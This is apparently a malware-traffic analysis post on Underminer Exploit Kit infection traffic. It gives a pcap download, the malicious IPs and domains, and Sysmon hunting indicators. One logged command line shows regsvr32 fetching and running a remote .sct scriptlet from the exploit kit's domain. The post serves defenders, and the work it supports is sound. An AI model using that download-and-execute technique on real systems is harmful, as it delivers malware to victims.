Example traffic of the Underminer Exploit Kit and how it interacts with an infected host

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2020-02-16-Underminer-EK-pcap.zip


ASSOCIATED DOMAINS:

167.88.61.197 Port 443 – mt.coolsite.best – Redirect to Underminer Exploit Kit
38.114.114.125 Port 443 – user.shorico.club – Underminer Exploit Kit

 


Shown above: Redirect and network traffic associated with the Underminer Exploit Kit

 


Shown above: Malvertising redirect traffic is GZIP encoded. Using Wiresharks export feature allows for export the GZIP file to a test file for further analysis

 


Shown above: Decoded GZIP shows redirect to mt.coolsite.best which redirects to the Underminer Exploit Kit

 


Shown above: Underminer Exploit Kit uses “Let’s Encrypt” SSL Certificate Authority along with the SSL Subject of user.shorico.club

 

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

A good indicator of malicious activity is iexplorer.exe (Or Any Browser) interacting with regsvr32.exe, powershell.exe, or cmd.exe.

[Sysmon Event 1 – Process Creation]
Image C:\Windows\System32\regsvr32.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Microsoft(C) Register Server
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\System32\regsvr32.exe” /s /i:”https://user.shorico.club/views/6ke4ua62j0vmgeq6ld84ri257o.sct” scrobj.dll
CurrentDirectory C:\Users\Jack\Desktop\
User Jack-PC\Jack
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe” SCODEF:3032 CREDAT:144385 /prefetch:2

Another good indicator of malicious activity is regsvr32.exe communicating outbound.

[Sysmon Event3 – Network Communication]
Image C:\Windows\System32\regsvr32.exe
User Jack-PC\Jack
Protocol tcp
SourceIp 192.168.4.88
SourceHostname
SourcePort 49375
SourcePortName
DestinationIp 38.114.114.125
DestinationHostname 125-114-114-38.clients.gthost.com
DestinationPort 443
DestinationPortName https